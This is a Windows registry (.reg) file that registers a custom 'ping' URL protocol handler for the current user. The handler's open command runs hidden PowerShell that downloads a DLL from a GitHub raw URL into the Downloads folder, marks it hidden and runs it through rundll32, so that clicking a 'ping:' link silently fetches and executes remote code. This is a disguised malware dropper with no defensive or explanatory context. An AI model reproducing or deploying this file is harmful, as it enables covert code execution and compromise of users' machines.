Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\ping]
@="URL:Ping Protocol"
"URL Protocol"=""

[HKEY_CURRENT_USER\Software\Classes\ping\shell]

[HKEY_CURRENT_USER\Software\Classes\ping\shell\open]

[HKEY_CURRENT_USER\Software\Classes\ping\shell\open\command]
@="powershell -W Hidden -c "$a=Join-Path $env:USERPROFILE Downloads;iwr -uri https://github.com/doe17409/tav-api/raw/refs/heads/main/llvmfunc.dll -o $a\\llvmfunc.dll;$b=Join-Path $a llvmfunc.dll;attrib +h $b;conhost conhost rundll32.exe $b,test;""